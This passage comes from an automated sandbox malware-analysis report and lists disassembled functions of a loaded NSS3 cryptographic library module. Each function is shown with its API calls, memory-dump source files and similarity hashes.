                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: htonlmemcpy$ErrorValue
                                                                                                                                                                                                                                                      • String ID: dtls13
                                                                                                                                                                                                                                                      • API String ID: 242828995-1883198198
                                                                                                                                                                                                                                                      • Opcode ID: 6d1b5232ed972261d6e72c8c9c048d8b2713fc0b29627d2e115d3eb54547cd89
                                                                                                                                                                                                                                                      • Instruction ID: b8ec734ec729fbce2a28e3717a83cf3c54a99397a333fa1d3a353a05e998cb50
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d1b5232ed972261d6e72c8c9c048d8b2713fc0b29627d2e115d3eb54547cd89
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1131D271A01211AFDB10DF28DC80F8AB7E4AF89349F158029E8289B751E731ED16CBE1
                                                                                                                                                                                                                                                      Function 6C47AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C47AFBE
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C599500,6C473F91), ref: 6C47AFD2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • DER_GetInteger_Util.NSS3(?), ref: 6C47B007
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C471666,?,6C47B00C,?), ref: 6C4C6AFB
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C47B02F
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C47B046
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3 ref: 6C47B058
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3 ref: 6C47B060
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 3627567351-3315324353
                                                                                                                                                                                                                                                      • Opcode ID: 187e043d834ae8a207a1ccc8ae21e98c9e4f9299d7a0b5f1b652720b96946a85
                                                                                                                                                                                                                                                      • Instruction ID: 0fbd463341f5ea9942369b7b36b58f9ed84646e97d602dae5a661815a081cf9d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 187e043d834ae8a207a1ccc8ae21e98c9e4f9299d7a0b5f1b652720b96946a85
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2331E5704043409BDB20CF149C49FEA77B4AF8636CF10465DE8B59BBD1E332950987A7
                                                                                                                                                                                                                                                      Function 6C473E60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4740D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C473F7F,?,00000055,?,?,6C471666,?,?), ref: 6C4740D9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4740D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C471666,?,?), ref: 6C4740FC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4740D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C471666,?,?), ref: 6C474138
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C473EC2
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C473ED6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C473EEE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C473F02
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3 ref: 6C473F14
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3 ref: 6C473F1C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C4D127C,00000000,00000000,00000000), ref: 6C4D650E
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C473F27
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 1076417423-3315324353
                                                                                                                                                                                                                                                      • Opcode ID: a855ac122bc101631abbaa5509484ca7b87e36a363aab6dc4c185e2c51510785
                                                                                                                                                                                                                                                      • Instruction ID: fd11ff5774cf83a601aa82a0b8fcfad80edeea7057d03f756ad38dee1563a64f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a855ac122bc101631abbaa5509484ca7b87e36a363aab6dc4c185e2c51510785
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6821F8B1904300ABD714DB15AC11FAB77B8EB4435CF05093DF949A7741F731A91887DA
                                                                                                                                                                                                                                                      Function 6C4BCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C4BCD08
                                                                                                                                                                                                                                                      • PK11_DoesMechanism.NSS3(?,?), ref: 6C4BCE16
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4BD079
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1351604052-0
                                                                                                                                                                                                                                                      • Opcode ID: 8f982f5ba810317abeac41c5032d8b7ec6957f892504efb866a347ddc2f3d1eb
                                                                                                                                                                                                                                                      • Instruction ID: 1449564201a83ca7424df0d8c5bcc67a878503defd01dc3019da259cf4db8f6d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f982f5ba810317abeac41c5032d8b7ec6957f892504efb866a347ddc2f3d1eb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7C15CB5A002199BDB20DF24CC84FDAB7B4AB48318F1541A8E948A7741E775EE95CFE0
                                                                                                                                                                                                                                                      Function 6C4ADC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C4B97C1,?,00000000,00000000,?,?,?,00000000,?,6C497F4A,00000000), ref: 6C4ADC68
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADD36
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADE2D
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADE43
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADE76
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADF32
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADF5F
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADF78
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADFAA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1886645929-0
                                                                                                                                                                                                                                                      • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                                                      • Instruction ID: b5b7dba26cc6bef2a4ae32a9ebba661c24efdb914a3c4a61a195d7ae517043d8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2681B570606A008BFF14CED9C890F5B7692DB7434AF24843ADD5ACAFE9E774D486C642
                                                                                                                                                                                                                                                      Function 6C483C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C483C76
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6C483C94
                                                                                                                                                                                                                                                        • Part of subcall function 6C4795B0: TlsGetValue.KERNEL32(00000000,?,6C4900D2,00000000), ref: 6C4795D2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4795B0: EnterCriticalSection.KERNEL32(?,?,?,6C4900D2,00000000), ref: 6C4795E7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4795B0: PR_Unlock.NSS3(?,?,?,?,6C4900D2,00000000), ref: 6C479605
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C483CB2
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C483CCA
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C483CE1
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C49AE42), ref: 6C4830AA
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4830C7
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C4830E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C483116
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C48312B
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PK11_DestroyObject.NSS3(?,?), ref: 6C483154
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C48317E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3167935723-0
                                                                                                                                                                                                                                                      • Opcode ID: 9725eb3c823ca89980d53cde6801e518cadd7fe8be122ede97fa867abd031ad9
                                                                                                                                                                                                                                                      • Instruction ID: 881ce6a4a80df15194f8cb6080a8cce3418c626b5e3f2c343c369ecfaa999f07
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9725eb3c823ca89980d53cde6801e518cadd7fe8be122ede97fa867abd031ad9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2661B2B5A01201ABEF11DE65DC41FAB76B9EF14748F084428EE0AAAB52F731D914C7F1
                                                                                                                                                                                                                                                      Function 6C4C3D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: PK11_GetAllTokens.NSS3 ref: 6C4C3481
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C4C34A3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: TlsGetValue.KERNEL32 ref: 6C4C352E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: EnterCriticalSection.KERNEL32(?), ref: 6C4C3542
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: PR_Unlock.NSS3(?), ref: 6C4C355B
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C3D8B
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4C3D9F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4C3DCA
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4C3DE2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C4C3E4F
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C3E97
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4C3EAB
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4C3ED6
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4C3EEE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2554137219-0
                                                                                                                                                                                                                                                      • Opcode ID: 9d9261a68fae56e545f5af8a436bcdca42c2f0ac990d11ee7667485f96226cb8
                                                                                                                                                                                                                                                      • Instruction ID: 48a1bf3b4a1d10d8a348e3903475fae31ad35f6412a06c5e2ca806bcb38ec5f5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d9261a68fae56e545f5af8a436bcdca42c2f0ac990d11ee7667485f96226cb8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78512579B006109FEB01EF69DC44FA673B4AF45319F060528DE095BB22EB31E944CBD2
                                                                                                                                                                                                                                                      Function 6C472C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(FA71756D), ref: 6C472C5D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0D30: calloc.MOZGLUE ref: 6C4D0D50
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0D30: TlsGetValue.KERNEL32 ref: 6C4D0D6D
                                                                                                                                                                                                                                                      • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C472C8D
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C472CE0
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C472CDA,?,00000000), ref: 6C472E1E
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C472E33
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: TlsGetValue.KERNEL32 ref: 6C472E4E
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: EnterCriticalSection.KERNEL32(?), ref: 6C472E5E
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: PL_HashTableLookup.NSS3(?), ref: 6C472E71
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: PL_HashTableRemove.NSS3(?), ref: 6C472E84
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C472E96
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: PR_Unlock.NSS3 ref: 6C472EA9
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C472D23
                                                                                                                                                                                                                                                      • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C472D30
                                                                                                                                                                                                                                                      • CERT_MakeCANickname.NSS3(00000001), ref: 6C472D3F
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C472D73
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6C472DB8
                                                                                                                                                                                                                                                      • free.MOZGLUE ref: 6C472DC8
                                                                                                                                                                                                                                                        • Part of subcall function 6C473E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C473EC2
                                                                                                                                                                                                                                                        • Part of subcall function 6C473E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C473ED6
                                                                                                                                                                                                                                                        • Part of subcall function 6C473E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C473EEE
                                                                                                                                                                                                                                                        • Part of subcall function 6C473E60: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C473F02
                                                                                                                                                                                                                                                        • Part of subcall function 6C473E60: PL_FreeArenaPool.NSS3 ref: 6C473F14
                                                                                                                                                                                                                                                        • Part of subcall function 6C473E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C473F27
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3941837925-0
                                                                                                                                                                                                                                                      • Opcode ID: af7c2316c3ee55d2d1559e91796230fb5a9e4525cac7cfe1339b6c8d0a67fed8
                                                                                                                                                                                                                                                      • Instruction ID: 3522171bff8407541051e41f7df236291e4f320a610454ec27a29fc41b0218e5
